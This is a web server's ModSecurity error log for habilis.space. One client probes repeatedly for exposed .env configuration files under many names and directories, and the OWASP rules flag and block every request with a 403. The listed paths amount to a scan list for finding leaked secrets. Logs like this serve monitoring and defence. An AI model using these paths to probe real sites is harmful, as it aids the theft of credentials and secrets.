[Mon May 11 17:33:33.033689 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env~"] [unique_id "agH2zTJnyuKVXoStDhbMwwAAAEs"]
[Mon May 11 17:33:33.033911 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env~"] [unique_id "agH2zTJnyuKVXoStDhbMwwAAAEs"]
[Mon May 11 17:33:33.034120 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zTJnyuKVXoStDhbMwwAAAEs"]
[Mon May 11 17:33:33.152651 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env1"] [unique_id "agH2zTJnyuKVXoStDhbMxQAAAEs"]
[Mon May 11 17:33:33.152866 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env1"] [unique_id "agH2zTJnyuKVXoStDhbMxQAAAEs"]
[Mon May 11 17:33:33.153082 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zTJnyuKVXoStDhbMxQAAAEs"]
[Mon May 11 17:33:33.273548 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env2"] [unique_id "agH2zTJnyuKVXoStDhbMxgAAAEs"]
[Mon May 11 17:33:33.273772 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env2"] [unique_id "agH2zTJnyuKVXoStDhbMxgAAAEs"]
[Mon May 11 17:33:33.274002 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zTJnyuKVXoStDhbMxgAAAEs"]
[Mon May 11 17:33:33.388758 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env_copy"] [unique_id "agH2zTJnyuKVXoStDhbMxwAAAEs"]
[Mon May 11 17:33:33.388983 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env_copy"] [unique_id "agH2zTJnyuKVXoStDhbMxwAAAEs"]
[Mon May 11 17:33:33.389221 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zTJnyuKVXoStDhbMxwAAAEs"]
[Mon May 11 17:33:33.508058 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.txt"] [unique_id "agH2zTJnyuKVXoStDhbMyAAAAEs"]
[Mon May 11 17:33:33.508296 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.txt"] [unique_id "agH2zTJnyuKVXoStDhbMyAAAAEs"]
[Mon May 11 17:33:33.508526 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zTJnyuKVXoStDhbMyAAAAEs"]
[Mon May 11 17:33:33.623461 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.json"] [unique_id "agH2zTJnyuKVXoStDhbMyQAAAEs"]
[Mon May 11 17:33:33.623733 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.json"] [unique_id "agH2zTJnyuKVXoStDhbMyQAAAEs"]
[Mon May 11 17:33:33.623945 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zTJnyuKVXoStDhbMyQAAAEs"]
[Mon May 11 17:33:34.054018 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.yaml"] [unique_id "agH2zjJnyuKVXoStDhbMygAAAEs"]
[Mon May 11 17:33:34.054272 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.yaml"] [unique_id "agH2zjJnyuKVXoStDhbMygAAAEs"]
[Mon May 11 17:33:34.054495 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zjJnyuKVXoStDhbMygAAAEs"]
[Mon May 11 17:33:34.168362 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.yml"] [unique_id "agH2zjJnyuKVXoStDhbMywAAAEs"]
[Mon May 11 17:33:34.168588 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.yml"] [unique_id "agH2zjJnyuKVXoStDhbMywAAAEs"]
[Mon May 11 17:33:34.168797 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zjJnyuKVXoStDhbMywAAAEs"]
[Mon May 11 17:33:34.287067 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/app/.env"] [unique_id "agH2zjJnyuKVXoStDhbMzQAAAEs"]
[Mon May 11 17:33:34.287318 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/app/.env"] [unique_id "agH2zjJnyuKVXoStDhbMzQAAAEs"]
[Mon May 11 17:33:34.287560 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zjJnyuKVXoStDhbMzQAAAEs"]
[Mon May 11 17:33:34.401972 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/apps/.env"] [unique_id "agH2zjJnyuKVXoStDhbMzgAAAEs"]
[Mon May 11 17:33:34.402218 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/apps/.env"] [unique_id "agH2zjJnyuKVXoStDhbMzgAAAEs"]
[Mon May 11 17:33:34.402427 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zjJnyuKVXoStDhbMzgAAAEs"]
[Mon May 11 17:33:34.516464 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/api/.env"] [unique_id "agH2zjJnyuKVXoStDhbMzwAAAEs"]
[Mon May 11 17:33:34.516723 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/api/.env"] [unique_id "agH2zjJnyuKVXoStDhbMzwAAAEs"]
[Mon May 11 17:33:34.516938 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zjJnyuKVXoStDhbMzwAAAEs"]
[Mon May 11 17:33:34.630974 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/web/.env"] [unique_id "agH2zjJnyuKVXoStDhbM0AAAAEs"]
[Mon May 11 17:33:34.631204 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/web/.env"] [unique_id "agH2zjJnyuKVXoStDhbM0AAAAEs"]
[Mon May 11 17:33:34.631421 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zjJnyuKVXoStDhbM0AAAAEs"]
[Mon May 11 17:33:35.114190 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/site/.env"] [unique_id "agH2zzJnyuKVXoStDhbM0QAAAEs"]
[Mon May 11 17:33:35.114502 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/site/.env"] [unique_id "agH2zzJnyuKVXoStDhbM0QAAAEs"]
[Mon May 11 17:33:35.114810 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zzJnyuKVXoStDhbM0QAAAEs"]
[Mon May 11 17:33:35.230011 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/public/.env"] [unique_id "agH2zzJnyuKVXoStDhbM0wAAAEs"]
